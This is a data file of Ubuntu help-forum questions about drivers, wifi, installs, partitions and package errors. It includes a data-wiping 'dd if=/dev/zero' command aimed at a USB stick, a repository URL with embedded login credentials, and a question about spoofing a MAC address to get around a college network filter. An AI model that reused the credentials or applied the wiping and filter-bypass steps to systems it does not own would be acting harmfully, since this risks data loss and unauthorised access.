430381	lenovo wireless issue	when i turn on my lenovo g550 , the wireless card 's led is not flashing and i can not scan for wireless networks . when i go to the additional drivers to install the missing driver i indeed find my driver . when i click on activate though it starts loading and says : an error occured '' refer to : /var/log/jockey.log '' the driver is not activated it seems . the output of jockey is : 2014-03-06 17:41:36,838 debug : broadcomwlhandler enabled ( ) : kmod disabled , bcm43xx : blacklisted , b43 : blacklisted , b43legacy : blacklisted 2014-03-06 17:41:36,952 debug : broadcomwlhandler enabled ( ) : kmod disabled , bcm43xx : blacklisted , b43 : blacklisted , b43legacy : blacklisted 2014-03-06 17:41:36,982 debug : broadcomwlhandler enabled ( ) : kmod disabled , bcm43xx : blacklisted , b43 : blacklisted , b43legacy : blacklisted 2014-03-06 17:41:37,098 debug : broadcomwlhandler enabled ( ) : kmod disabled , bcm43xx : blacklisted , b43 : blacklisted , b43legacy : blacklisted 2014-03-06 17:41:37,841 debug : shutting down even though i get that error message i get wireless internet after that , but when i boot up again i have to follow the same procedure .
430382	repeat a command every x interval of time in terminal ?	how can i repeat a command every interval of time , so that it will allow me to run commands for checking or monitoring directories ? there is no need for a script , i need just a simple command to be executed in terminal .
430384	`` turn screen off when inactive '' -setting from terminal	i want to turn the `` turn screen off when inactive for x minutes '' setting ( in the brightness settings ) to `` never '' from the terminal , but i could n't find the right command . this will be used in a executable file to change a few settings on a ubuntu live installation . edit : due to more involved reasons i want to change this specific setting which is independent of the screen saver settings ( i think ) .
430388	stuck on render ring in fullscreen when having used `xrendr -o right`	at work i am supposed to get a java application running in fullscreen on a big-screen tv . this tv is connected to a intel nuc device , which is running lubuntu 13.10 . this tv is hanging on the wall and is tilted . if you turn your head 90 degrees left then you will look at the tv `` normally '' . to compensate for this , i have edited the [ xrandr ] section of ~/.config/lxsession/lubuntu/desktop.conf in the following way : [ xrandr ] mode=command command=xrandr -o right this causes the screen to be more readable by all humans that are keeping their feet on their ground and their head up ( but still looking straight forward ) . however , when i start a java application that is showing , the x handler freezes . i can move the mouse but not use it . i ca n't seem to use the keyboard in any way except switching to a tty . the ttys output these error messages on different intervals : stuck on render ring ( most common , about once every 3 seconds ) render ring stuck inside bo ( quite common , perhaps once every 30 seconds ) timed out waiting for forcewake old ack to clear ( very rare , but still seem to happpen sometimes ) for completeness sake , here is the java code i am running to show the application in full screen : graphicsdevice [ ] devices = graphicsenvironment.getlocalgraphicsenvironment ( ) .getscreendevices ( ) ; frame.setvisible ( false ) ; frame.dispose ( ) ; frame.setundecorated ( true ) ; graphicsdevice device = devices [ 0 ] ; rectangle rect = device.getdefaultconfiguration ( ) .getbounds ( ) ; frame.setbounds ( rect.x , rect.y , rect.height , rect.width ) ; // width and height have switched places because of the display being rotated device.setfullscreenwindow ( frame ) ; frame.setresizable ( false ) ; frame.setalwaysontop ( false ) ; frame.setvisible ( true ) ; ( this code is from an so question about how to show a jframe in full screen ) i have tried installing new drivers , intel ( r ) graphics installer 1.0.4 for linux* from https : //01.org/linuxgraphics/downloads ( graphics installer for ubuntu* 13.10 , 32-bit ) . this does n't help : ( the thing is that when not changing desktop.conf , the java application works perfectly well in full screen . so it seems to be related to the xrandr -o right command . any ideas , suggestions , thoughts appreciated .
430389	how to opt out of ubuntu development branch	for reasons unknown to me , my server running ubuntu 13.10 suddenly updated to the beta version of ubuntu 14.04 . i need my server running ubuntu 13.10 . how can i downgrade back to ubuntu 13.10 without loosing my data and opt out of the beta program ?
430391	ubuntu partitions after installation	i installed ubuntu 13.10 to this device ( picture below ) , and it has the following partitions on the image below , i ca n't resize the extended partition , i want to create a ntfs partition on same device is there any idea how to do it ?
430392	apache2 enable ssl on subdirectory	i just turned on ssl on my server , if i type on the browser https : //myserver i get main apache welcome page if i use https : //myserver/mydir i get a 404 error , if i simply use http : //myserver/mydir i get right content . how can i resolve my problem ? thanks in advance , ciao h .
430393	libreoffice sdk	please anyone help me to install and correctly configure libreoffice sdk in ubuntu 13.04 . i have installed sdk using sudo apt-get install libreoffice-dev and then configured it by /usr/lib/libreoffice/sdk/setsdkenv_unix.sh and got following output : - sdk environment is prepared for linux sdk = /usr/lib/libreoffice/sdk office = /usr/lib/libreoffice ure = /usr/lib/libreoffice/ure-link make = /usr/bin zip = /usr/bin c++ compiler = /usr/bin java = /usr/lib/jvm/java-7-openjdk-i386 sdk output directory = /home/dawnavd/openoffice.org4.1_sdk auto deployment = no but still i 'm not able to run this c++ example please help me and tell what else need to be done . following are details of error i 'm getting while running this c++ example i first run this : make -f makefile.txt and then i got following output and error message : - mkdir -p desktop/gsoc/libreoffice4.1_sdk/linuxexample.out/misc rm -f desktop/gsoc/libreoffice4.1_sdk/linuxexample.out/misc/oosdk_cpp_types.flag `` /usr/lib/libreoffice/sdk/bin/cppumaker '' -gc - odesktop/gsoc/libreoffice4.1_sdk/linuxexample.out/inc `` /usr/lib/libreoffice/ure-link/share/misc/types.rdb '' `` /usr/lib/libreoffice/program/types/offapi.rdb '' error : can not open for writing make : *** [ desktop/gsoc/libreoffice4.1_sdk/linuxexample.out/misc/oosdk_cpp_types.flag ] error 1
430398	wd elements 1042 external will not work	i 'm trying to get all my data at this point . any help ? once and a while it will mount but cant get data off quickly . error message : error mounting /dev/sdb1 at /media/ubuntu/elements : command-line `mount -t `` ntfs '' -o `` uhelper=udisks2 , nodev , nosuid , uid=999 , gid=999 , dmask=0077 , fmask=0177 '' `` /dev/sdb1 '' `` /media/ubuntu/elements '' ' exited with non-zero exit status 21 : fuse : mount failed : device or resource busy ( udisks-error-quark , 0 ) ~ $ lsusb bus 002 device 002 : id 064e : a103 suyin corp. acer/hp integrated webcam [ cn0314 ] bus 002 device 003 : id 1058:1042 western digital technologies , inc . bus 002 device 001 : id 1d6b:0002 linux foundation 2.0 root hub bus 006 device 001 : id 1d6b:0001 linux foundation 1.1 root hub bus 005 device 001 : id 1d6b:0001 linux foundation 1.1 root hub bus 001 device 001 : id 1d6b:0002 linux foundation 2.0 root hub bus 004 device 001 : id 1d6b:0001 linux foundation 1.1 root hub bus 003 device 001 : id 1d6b:0001 linux foundation 1.1 root hub sudo fdisk -l disk /dev/sda : 320.1 gb , 320072933376 bytes 255 heads , 63 sectors/track , 38913 cylinders , total 625142448 sectors units = sectors of 1 * 512 = 512 bytes sector size ( logical/physical ) : 512 bytes / 512 bytes i/o size ( minimum/optimal ) : 512 bytes / 512 bytes disk identifier : 0x64befb2b device boot start end blocks id system /dev/sda1 2048 24578047 12288000 27 hidden ntfs winre /dev/sda2 * 24578048 24782847 102400 7 hpfs/ntfs/exfat /dev/sda3 24782848 625139711 300178432 7 hpfs/ntfs/exfat disk /dev/sdb : 1000.2 gb , 1000202043392 bytes 255 heads , 63 sectors/track , 121600 cylinders , total 1953519616 sectors units = sectors of 1 * 512 = 512 bytes sector size ( logical/physical ) : 512 bytes / 512 bytes i/o size ( minimum/optimal ) : 512 bytes / 512 bytes disk identifier : 0x0002846e device boot start end blocks id system /dev/sdb1 2048 1953519615 976758784 7 hpfs/ntfs/exfat
430399	install media codecs in 13.10	i tried to watch a movie but the movie player wo n't let me , and a screen popped up saying : videos requires to install plugins to play files of the following types : mpeg-1 layer 3 ( mp3 ) decoder , mpeg-4 video decoder the pop up wo n't give me the choice to search for a package like other times and i do n't know which to install or what command to use .
430403	`` new partion table '' option is not active while installing ubuntu 13.10	i am trying to install ubuntu 13.10 but the `` new partition table '' option is not active , . i have shrunk my drive and have 70 gb unallocated space.. but while installing it is not showing as `` free space '' , rather it is showing it as unused space . i had selected `` something else '' my e drive was of 155 gb . i shrunk it down to 85 gb and made 70 gb unallocated .
430406	why would ssh ask for password every other day ?	so i 've been using ssh for quite a while with a server for the company i work with . since about a month ago ssh keeps asking me for my passphrase for the rsa key , mind you , it does it every other day . one day it does n't ask for it and the next day it does , and the cycle repeats every other day . i 've set my id_rsa.pub key to -rw-r -- r -- and my private key to -rw -- -- -- what could be the cause of this ? edit 1 : it 's my own computer , i 'm the only user , i 'm a freelance webdev . i 've been using ssh flawlessly for a few years now , and the issue started a month ago .
430408	how to connect my android phone to a mac filter enabled rooter ?	my college wifi has mac address filter and only laptops can be connected to that networks . i want to connect my android phone to that network to browse the highspeed internet.is it possible to turn on both wifi and hotspot at the same time in my laptop , ( i 'm using ubuntu 13.04 ) .is it possible to change the mac address of my rooted android device to any lap 's mac address and connect to that hotspot ?
430410	black screen after screen off on 13.10	i swtiched `` turn screen off when inactive for '' to 3 minutes and lock screen after screen goes off to on . the problem is that after the screen is off , when i try to come back i can`t do anything , the screen keeps staying off and i need to restart . when i chose `` suspend '' it 's the same problem .
430413	temporary keyboard layout switch in ubuntu 13.10 ( give my right alt back ! )	in ubuntu 13.10 : is there a way to temporarily switch the keyboard layout ? use case : while i am typing text in russian and need to input # sign ( or maybe a little word in english : `` cat '' or something ) . what i do now : alt + shift - to switch to english shift + 3 alt + shift again to switch back to russian damn ! 3 steps for a character ! it hurts our fingers ! is there a way of getting things like # without the need of that `` big '' switching ? in good old days holding right alt gave the possibility to type letters in another language without switching the whole layout .
430415	unable to log in ubuntu	screenshot got a strange problem on my ubuntu 12 vm boot , it seems to be able to log only after several restarts or shutdowns ( of the vm ) . at the beggining it used to also show `` checking battery status [ ok ] '' but now just only `` [ ok ] '' . if anyone has the same problem and could get to resolve it , please tell me how . regards !
430416	problems after nvidia updates were installed	hello everyone , i am very new with ubuntu i installed yesterday about 5 nvidia drivers and after that the pc restarted and all i could see was a black screen with an underline on the top.all i want is to use my pc on two monitors , one of them being my tv . i already have a hdmi cable plugged in and the pc detects my tv but it*s just a black screen . probably because of the video card uninstalled updates . so how do i fix this ? should i install all updates again or should i find another ones ?
430417	xubuntu volume multimedia keys not working despite changing the active card	the indicator applet works . alsamixer works . amixer commands work but they wo n't use notify-osd to display the volume levels . i followed the solution present here : volume keys are working in unity but not in xfce4 but it does not work . i restarted the xfce4-volumed . how can i know which card is it using ?
430418	problem with user account after reinstalling ubuntu-desktop	after reinstalling ubuntu-desktop and xserver when i try to login into my account i get on login screen again.now i can login only into user account.what to do ?
430423	how to install the drivers for my samsung ml-1670 ?	i have the ubuntu 12.04 lts version and i downloaded the .tar.gz file from the samsung website , i already extracted it content , but i do n't know what to do now to install it .
430424	how to update to java 7 without interfering with java 6 dependent apps ?	i 'm running jetty 7.6 on ubuntu . it 's serving live traffic . that particular version of jetty needs java 6 . now i want to install java 7 on that machine . will that mess up my jetty instance that 's currently live ? also , will updating to java 7 make ubuntu choose it as the default jdk to use the next time i invoke a java app ? if possible i 'd like to : install java 7 jdk . not make it the default , but allow me to explicitly invoke an app using java 7 . this will let me test newer versions of jetty ( that require java 7 ) without messing up my live installation . thanks
430425	firefox performance got affected	i followed the instructions in the following link , the instructions in the accepted answer . why wo n't videos on a particular website play under ubuntu 13.04 ? i executed the commands in the link provided ( http : //doc.ubuntu-fr.org/m6replay ) in the answer . after this , my firefox browser is not working properly . please help me to restore the firefox . thanks note : i am using ubuntu 12.10 and firefox 27.0.1
430426	login sound not playing	i had originally changed the login sound from the default and had it for a year , now that i want to change it to something else it just isnt playing.i followed all the instructions mentioned in all the other threads.the new file is of .ogg type , i have it stored in both the locaion ( sound and stereo ) , and i also changed the name from the earlier song to the new one in gnome login sound ( i even tried putting the old one back , it seems that isnt playing either ) !
430427	problem during installation - ubuntu 12.04	i 'm installing ubuntu 12.04 but i had this error : an error occurred while installing packages : '' command ' [ 'debconf-apt-progress ' , ' -- ' , 'apt-get ' , '-y ' , 'install ' , 'user-first-login-u1 ' , 'poppler-data ' , ... ... ... ... ... ... ... ... ... ... . i still quote the message appears .. this may be due to using an old image , or it may be due to a bug in some of the packages listed above . more details may be found in var/log/syslog.the installer will try to continue anyway , but may fail at later point , and will not be able to install or remove other packages ( possibly including itself ) from the installed system . you should look for newer versions of your installer image , or failing that report the problem to your distributor . so what should i do ?
430428	i installed and uninstalled ubuntu and now i can not merge 2 volumes ?	i installed ubuntu in my lappy and i think i converted it from dynamic to basic or basic to dynamic , i do n't know specifically . but the problem is that now i am again using windows 8 and there is a 30 gb free space that i want to merge with my other partition but it is not showing extend volume option . also , all the other volumes apart from c ( where windows is installed ) are showing as 1 . how can i merge my 2 volumes ?
430432	how can i add or edit chapter markers with an m4v file ?	i am doing some simple video editing and i want to add/edit chapters . this is a 5 hour video , so chapter makers can be very useful . i ripped video from dvds using handbrake and put them together using openshot . handbrake preserved the chapters from the dvd , but i want to create my own chapter markers . openshot has removed all chapter markers and i do n't see a way of adding them .
430434	replace openjdk with oracle-jdk on ubuntu	i have an ubuntu system and i want to replace my openjdk with oracle-jdk . however if i remove my open-jdk and then install oracle-jdk , when i try to install some packages they want to install openjdk and i do n't want this . is there any way to install those packages on top of oracle-jdk ? one of those packages is freemind .
430439	chrome locking up session	i have ubuntu 12.04 installed , running gnome 3 , and yesterday i installed pepper flash . ever since chrome has been locking up on different webpages . at first it was strictly youtube but now it seems to be others sites also . anything with any type of flash or heavy scripting . i would be comfortable with chromium crashing and simply reloading it . but when it crashes , it locks up my whole session and even after entering the terminal ( ctrlaltf1 ) , and killing all the chromium processes it still shows a frozen screen with chromium up . i can see my mouse pointer move up on the top menu bar , but the gnome interface is unresponsive as well . i am a total newbie to troubleshooting linux . what else can i do to get my session back without rebooting my box ? also where can i check the logs to see if pepper flash is my issue ?
430444	disk wo n't go out of readonly	i have this usb that is set to write protected . i need to get it formtatted however everything i tried from dd if=/dev/zero of=/dev/sdd1 to fdisk /dev/sdd d w all end up telling me that i do n't have permission to write to this disk . gparted and all the other tools i 've tried return the same thing . hdparm -r0 /dev/sdd goes through but then none of the other steps work .
430449	wireless internet unstable on ubuntu 12.04	i am getting really frustrated with my wifi connection on ubuntu . internet goes numb after every 30 minutes more or less . i also have windows 7 installed on the same machine and internet works perfectly so it must be a problem related to ubuntu . i am not looking for a quick fix , i am using now ubuntu on a daily basis and i would like to try some manual or tutorial to diagnose the problem and solve it for good . this is what lspci returns : 00:00.0 host bridge : intel corporation core processor dram controller ( rev 18 ) 00:01.0 pci bridge : intel corporation core processor pci express x16 root port ( rev 18 ) 00:16.0 communication controller : intel corporation 5 series/3400 series chipset heci controller ( rev 06 ) 00:1a.0 usb controller : intel corporation 5 series/3400 series chipset usb2 enhanced host controller ( rev 06 ) 00:1b.0 audio device : intel corporation 5 series/3400 series chipset high definition audio ( rev 06 ) 00:1c.0 pci bridge : intel corporation 5 series/3400 series chipset pci express root port 1 ( rev 06 ) 00:1c.2 pci bridge : intel corporation 5 series/3400 series chipset pci express root port 3 ( rev 06 ) 00:1d.0 usb controller : intel corporation 5 series/3400 series chipset usb2 enhanced host controller ( rev 06 ) 00:1e.0 pci bridge : intel corporation 82801 pci bridge ( rev a6 ) 00:1f.0 isa bridge : intel corporation 5 series chipset lpc interface controller ( rev 06 ) 00:1f.2 raid bus controller : intel corporation 82801 sata controller [ raid mode ] ( rev 06 ) 00:1f.3 smbus : intel corporation 5 series/3400 series chipset smbus controller ( rev 06 ) 01:00.0 vga compatible controller : nvidia corporation gt218 [ geforce 405 ] ( rev a2 ) 01:00.1 audio device : nvidia corporation high definition audio controller ( rev a1 ) 02:00.0 ethernet controller : realtek semiconductor co. , ltd. rtl8111/8168/8411 pci express gigabit ethernet controller ( rev 03 ) 03:00.0 firewire ( ieee 1394 ) : via technologies , inc. vt6315 series firewire controller ( rev 01 ) thanks !
430450	permission issues after moving from folder from one partition to another	i am using ubuntu . i moved all my c programs/coded which was in a folder from one partition to another , after that all my files have -rw -- -- -- - the owner has just the read and write permission , even though i used chmod 777 on all my files the permission remains the same -rw -- -- -- - . i also tried chown . i tried both the commands as superuser . due to this permission change i ca n't run any of my executable . even when i compile and generate the executable it still has the same -rw -- -- -- - permission . how can i change the permissions now ? how to solve this issue ?
430451	ubuntu nas , cache files to ram for enhanced transfers ?	i have a little dual core celeron computer that i will be using as a nas . i have 8 gb of ram , and i was wondering if there was anyway to leverage that ram to increase file transfer speeds , especially in a multiple user scenario . ie : when someone wants to watch a show , it starts playing the hdd , but then transfers the whole show to ram , and plays it from there , leaving the hdd to do nothing till needed ? is this a possibility ? does this happen naturally ? am i crazy ? thanks !
430453	graphic mode in ubuntu server	i have ubuntu server installed on virtualbox , and ubuntu 13.10 as the host os . i installed the lxde desktop environment on the guest os ( ubuntu server ) : sudo ap-get install lubuntu-desktop but when i rebooted the guest it did n't run with the graphical mode . how can i run that graphical mode ?
430455	run multiple screen sessions in a bash script	i know this has been asked for many times . but my script just would not work . i would like to write a simple script running on ec2 in the beginning , which creates two screen sessions and execute some commands in each . previously , i would do : screen mongod -- dbpath /home/ubuntu/data/db ctrl a+c python /home/ubuntu/rest_ec2/bottle_ec2.py but when i translate this to a bash script , it complained : must be connected to a terminal . here is my script : # ! /bin/bash screen -s -d -m mongod -- dbpath /home/ubuntu/data/db & screen -s -d -m python /home/ubuntu/rest_ec2/bottle_ec2.py & i appreciate any suggestions !
430456	should i install bootloader on hard drive with windows or hard drive which 's gon na get lubuntu installed ?	/dev/sda1 has windows and im installing lubuntu on /dev/sdc . where should i install bootloader ? ( im just takin `` the plunge '' and hopefully ill like lubuntu more than laggy bloated windows )
430462	problems with installing bcmwl-kernel-source . ubuntu 13.10 on macbook pro	i recently just got ubuntu 13.10 . i was messing around with the live version of it and my wifi was working fine . i decided to install it and when i go to set up the driver to hook up my wireless it has me authorize it by putting in my password . then it start to download then it goes back to something like , `` do not use this device '' . i have tried installing : sudo apt-get install bcmwl-kernel-source it starts to load and it gives me the option if i want to continue or not . i insert `` y '' . it then spits out : err http : //us.archive.ubuntu.com/ubuntu/ saucy/main dims all 2.2.0.3-1.1ubuntu4 could not resolve 'us.archive.ubuntu.com' err http : //us.archive.ubuntu.com/ubuntu/ saucy/restricted bcmwl-kernel-source amd64 6.30.223.141+bdcom-0ubuntu.com could not resolve 'us.archive.ubuntu.com' err http : //us.archive.ubuntu.com/ubuntu/ saucy/main fakeroot amd64 1.20-1 could not resolve 'us.archive.ubuntu.com' failed to fetch http : //us.archive.ubuntu.com/ubuntu/pool/main/d/dkms/dkms_2.2.0.3-1.1ubuntu4_all.deb could not resolve 'us.archive.ubuntu.com' failed to fetch http : //us.archive.ubuntu.com/ubuntu/pool/restricted/b/bcmwl/bcmwl-kernel-source_6.30.223.141+bdcom-0ubuntu1_amd64.deb could not resolve 'us.archive.ubuntu.com' failed to fetch http : //us.archive.ubuntu.com/ubuntu/pool/main/f/fakeroot/fakeroot_1.20-1_amd64.deb could not resolve 'us.archive.ubuntu.com' e : unable to fetch some archives , maybe run apt-get update or try with -- fix-missing i spaced out some of the links because my rep is not high enough to put more than 2 but ... i have no idea what do do from there . help would be appreciated .
430463	running hostap tests/hwsim/vm/vm-run.sh not working	i am trying to run the hwsim tests supplied with the hostap repo . inside the tests/hwsim i run the build.sh script which works fine . as long as i kill network-manager and all modules that are related to wifi ( { cfg , mac } 80211 , iwlifi etc . ) i can run the ./run-all.sh script . it seems to have much more failures that i would think that it should . so i am trying now to get the tests/hwsim/vm/vm-run.sh script to work . i have supplied a vm-config files which has the path to the directory where i built a kernel with the tests/hwsim/vm/kernel-config as the .config . now when i try to run ./vm-run.sh i get this error ( even when i run as root ) : starting test run in a virtual machine w : kvm binary is deprecated , please use qemu-system-x86_64 instead libkmod : error ../libkmod/libkmod.c:554 kmod_search_moddep : could not open moddep file '/lib/modules/3.13.0-wl/modules.dep.bin' hwsim0 : error while getting interface flags : no such device failed to connect to wpa_supplicant global interface : /tmp/wpas-wlan0 error : no such file or directory failed to connect to wpa_supplicant global interface : /tmp/wpas-wlan0 error : no such file or directory failed to connect to wpa_supplicant global interface : /tmp/wpas-wlan0 error : no such file or directory failed to connect to wpa_supplicant global interface : /tmp/wpas-wlan0 error : no such file or directory failed to connect to wpa_supplicant global interface : /tmp/wpas-wlan0 error : no such file or directory failed to connect to wpa_supplicant global interface : /tmp/wpas-wlan0 error : no such file or directory failed to connect to wpa_supplicant global interface : /tmp/wpas-wlan0 error : no such file or directory failed to connect to wpa_supplicant global interface : /tmp/wpas-wlan0 error : no such file or directory failed to connect to wpa_supplicant global interface : /tmp/wpas-wlan0 error : no such file or directory failed to connect to wpa_supplicant global interface : /tmp/wpas-wlan0 error : no such file or directory could not connect to /tmp/wpas-wlan0 test run completed logfiles are at /tmp/hwsim-test-logs/1394129388
430464	how to install dash reports on ubuntu	dash reports does not provide any installation help . it offers a .war for download and that is it . i guess using apache tomcat would be a logical thing to do , but what are the steps to get this piece of software to run ?
430466	problem with booting from usb in order to install grub	i 've recently installed ubuntu 13.10 alongside windows 8.1 on my laptop ( via usb ) , but the boot loader ( grub ) does not show up . i 've tried to run ubuntu in trial mode from usb in order to install boot repair , but when i start it , i get the low graphics mode error , and i can not run it at all . i 've tried reinstalling ubuntu , but it did n't work either .
430467	fix dpkg error 1 in python-minimal	i have seen a number of fixes on these forums , but they all seem to involve removing the offending package . in my case , that 's python-minimal , and if i remove that it will break everything . can anyone help me out ? i would also appreciate it if someone could link me to a page that explains the common root causes of this error rather than just providing steps to fix it . i want to learn ! : - ) $ sudo apt-get install coreutils reading package lists ... building dependency tree ... reading state information ... coreutils is already the newest version . 0 upgraded , 0 newly installed , 0 to remove and 3 not upgraded . 4 not fully installed or removed . after this operation , 0 b of additional disk space will be used . do you want to continue [ y/n ] ? y setting up python2.7-minimal ( 2.7.3-0ubuntu3.5 ) ... # empty sitecustomize.py to avoid a dangling symlink traceback ( most recent call last ) : file `` /usr/lib/python2.7/py_compile.py '' , line 170 , in < module > sys.exit ( main ( ) ) file `` /usr/lib/python2.7/py_compile.py '' , line 162 , in main compile ( filename , doraise=true ) file `` /usr/lib/python2.7/py_compile.py '' , line 106 , in compile with open ( file , 'u ' ) as f : ioerror : [ errno 2 ] no such file or directory : '/usr/lib/python2.7/sitecustomize.py' dpkg : error processing python2.7-minimal ( -- configure ) : subprocess installed post-installation script returned error exit status 1 dpkg : dependency problems prevent configuration of python2.7 : python2.7 depends on python2.7-minimal ( = 2.7.3-0ubuntu3.5 ) ; however : package python2.7-minimal is not configured yet . dpkg : error processing python2.7 ( -- configure ) : dependency problems - leaving unconfigured dpkg : dependency problems prevent configuration of libpython2.7 : libpython2.7 depends on python2.7 ( = 2.7.3-0ubuntu3.5 ) ; however : package python2.7 is not configured yet . dpkg : error processing libpython2.7 ( -- configure ) : dependency problems - leaving unconfigured dpkg : dependency problems prevent configuration of python2.7-dev : python2.7-dev depends on python2.7 ( = 2.7.3-0ubuntu3.5 ) ; however : package python2.7 is not configured yet . python2.7-dev depends on libpython2.7 ( = 2.7.3-0ubuntu3.5 ) ; however : package libpython2.7 is not configured yet . dpkg : error processing python2.7-dev ( -- configure ) : dependency problems - leaving unconfigured errors were encountered while processing : python2.7-minimal python2.7 libpython2.7 python2.7-dev
430468	install the ubuntu with window 7	i want to install ubuntu on my laptop through original cd and i have pre installed window 7 home basic but i want to install with window 7. means that i want to keep both the window 7 and ubuntu , kindly tell me the procedure t install the ubuntu.i will be highly obliged t you.thank you .
430472	what is a repository ? how does it differ from a ppa ?	while installing something i often came across the term repository . can anyone tell what it is ? also , what is different to a ppa ?
430474	ubuntu 12.04.4 asus eeepc 1018p install hanging	i created a bootable usb with lili and the ubuntu 12.04.4 lts iso and was able to successfully boot from the usb . however , at the point where i tell ubuntu to actually install the os ( with checkboxes checked to install latest updates for flash etc and the checkbox checked for fluendo mp3 ) it seems to just hang with the spinning wheel going . i have the netbook plugged into a power source and the ethernet is also connected . i let this happen overnight thinking i would wake up to the next step in the installation or just that it completed but it was still hanging . i was able to click out of the installer and the os was running , however , i believe it is just running directly from the usb stick and not from my netbook 's hd . i also was able to open up mozilla and get a webpage so i know the connectivity is there to allow the installer to download whatever updates it needed during installation . has anyone had this happen to them at all ? i did n't see anything in the eee pc installation documentation here . edit : i think i may have figured out why i am having issues with my install while if i bail out of the install , the os appears to still be running . when i created my bootable usb with linuxlive ( lili ) , in step 4 i had the checkbox checked to enable launching linuxlive in windows ( requires internet to install ) which , if i am reading the documentation correctly , means ubuntu will be virtualized when the machine is booted from the resulting bootable usb . i wanted a complete install of ubuntu as opposed to virtualizing the os on my windows 7 machine ( asus eee pc 1018p ) and therefore should have unchecked this option in step 4 of the bootable usb creation in lili . going to go back and re-create my bootable usb and reboot my machine for the install and see if that resolves my issue .
430482	unable to install php5-sqlite	$ sudo apt-get install php5-sqlite [ sudo ] password for umpirsky : reading package lists ... done building dependency tree reading state information ... done some packages could not be installed . this may mean that you have requested an impossible situation or if you are using the unstable distribution that some required packages have not yet been created or been moved out of incoming . the following information may help to resolve the situation : the following packages have unmet dependencies : php5-sqlite : depends : php5-common ( = 5.5.3+dfsg-1ubuntu2.2 ) but 5.5.7+dfsg-1+sury.org~raring+1 is to be installed e : unable to correct problems , you have held broken packages .
430484	restart problem after uninstall ubuntu from windows 7	i uninstalled ubuntu from windows 7 in stupidest way . i deleted the partition memory of ubuntu from windows . when i restarted my system it stuck into `` grub rescue '' . how to solve this problem. ? any advice . all my work are stuck into windows and i ca n't do anything now . pls help me. ! i 'm new to ubuntu and i do n't know how it works . i do n't want ubuntu in my system .
430485	can i use my ipad as installation media ?	pc has crashed and no real access to another pc for a quick fix . if i could download the installer on my ipad and connect my ipad to my usb and boot my computer off of that ... .. that would be wonderful !
430487	wanted : in-depth guide to virtualizing existing windows 7 partition with virtualbox	i would like an in-depth guide to virtualizing an existing windows 7 partition ( with virtualbox ) , as all the instructions i have found online are either incomplete , imperfect , vaguely worded , or out of date . i find it surprising that there is n't a good in'depth guide to such a , as i assume , common problem . ! this is not to be considered a duplicate , as there is not one satisfying answer to any of the similar posts out there ! help would be much appreciated by newbie . desired results : -one installation of win7 , accessible both via boot menu and vm -preferrably as little as possible problems with drivers & reactivation thanks in advance . instructions that did n't suit my needs : http : //www.virtualbox.org/manual/ch09.html # rawdisk - does n't address driver/reactivation problem http : //geekery.amhill.net/2010/01/27/virtualbox-with-existing-windows-partition/ - out-of-date , vague and others , which i do n't have enough reputatioins at the moment to post links to ...
430491	ca n't install ubuntu from usb on intel mac osx 10.4	i am trying to install ubuntu on intel mac osx 10.4 . i followed all the instructions provided on ubuntu forums . i also installed refit on my mac . but after i restart the computer and go into the refit menu , i just see boot legacy os options , and do not see any option for booting from the usb drive i created . i am reading here that it the usb needs grub2 and so on but if there is anything extra needed it should be part of the clear instruction process . i have spent two frustrating days trying to install ubuntu , and it certainly is not motivating .
430494	lightdm will not install ubuntu 12.04	ok , i am new to ubuntu . lightdm stopped working , so i pressed ctrl + alt + f1 to open up the graphical log in screen and typed in sudo apt-get remove lightdm which worked but when i type sudo apt-get install lightdm it goes like this jackshaw @ jackshaw-stormfly : / $ sudo apt-get install lightdm reading package lists ... done building dependency tree reading state information ... done package lightdm is not available , but is referred to by another package . this may mean that the package is missing , has been obsoleted , or is only available from another source e : package 'lightdm ' has no installation candidate thanks , any advice would be appreciated . i have typed in cat /etc/apt/sources.list and the output was this deb http : //archive.ubuntu.com/ubuntu/ precise main restricted universe multiverse deb http : //archive.ubuntu.com/ubuntu/ precise-updates main restricted universe multiverse deb http : //archive.ubuntu.com/ubuntu/ precise-backports main restricted universe multiverse deb http : //security.ubuntu.com/ubuntu precise-security main restricted universe multiverse deb http : //archive.canonical.com/ubuntu precise partner deb http : //extras.ubuntu.com/ubuntu precise main # now computing packages deb http : //1z7nt63h : w13von94 @ packages.nowcomputing.com/ubuntu precise multiverse
430497	black desktop after login and problems with gui in ubuntu 12.10 , 13.04 and 13.10 ( currently using 13.10 )	i am having problems with the gui when i log in . please check out the youtube-link at the bottom first to see the problem . ( i am currently using 13.10 ) problem : first of all , when i have logged in and reached the desktop it is black instead of showing the real background . the graphics lag when i move the pointer over icons ( e.g the text that shows up describing the icons to the left remains after i have removed the pointer ) and if i open a window and move it around trace of its graphics remains ( like to paint the `` frame '' all over the background if i move it all over the desktop , common lag problem in windows xp etc. ) . what i do to fix the problem is simply to use xkill on the background and all the lag stops . the real desktop image comes back after a few minutes and everything turns to normal . i have done like this a couple of months but a better solution to the problem likely exists . i 've had the same problem in 12.10 and 13.04 , every time i have upgraded to a new version the problem have remained the same . what should i do ? link to a youtube-video showing my problem : http : //www.youtube.com/watch ? v=kwfqfm7paym
430498	fix software source	i wanted to upgrade to 14.04 from 13.10 however i decided not to went with it , every thing works as exacted only software list is really messed up is there a way to fix this to return it to as it was or at least to change it to default settings ? ? thank you in advanced
430500	firefox is acting sluggish	i am having problems with running firefox on ubuntu 12.04 . i am finding it to be sluggish at times . the symptoms i experience are : at times temporary freezing of the screen when trying to scroll up or down . randomly certain tabs wont load at all and need to be manually refreshed . additionally at times tabs wont load completely and only parts of the page load . also , on the firefox health report , in the past 5 days i 've had 4 crashes recorded . my system specs are : ubuntu 12.04 6gb ram 24gb ssd with operating system on it 1tb hdd for media with symbolic links to the home directory intel i5-3317u @ 1.70ghz ă 4 intelâž hd graphics 4000 firefox version 27.0.1 any help given will be greatly appreciated . thank you
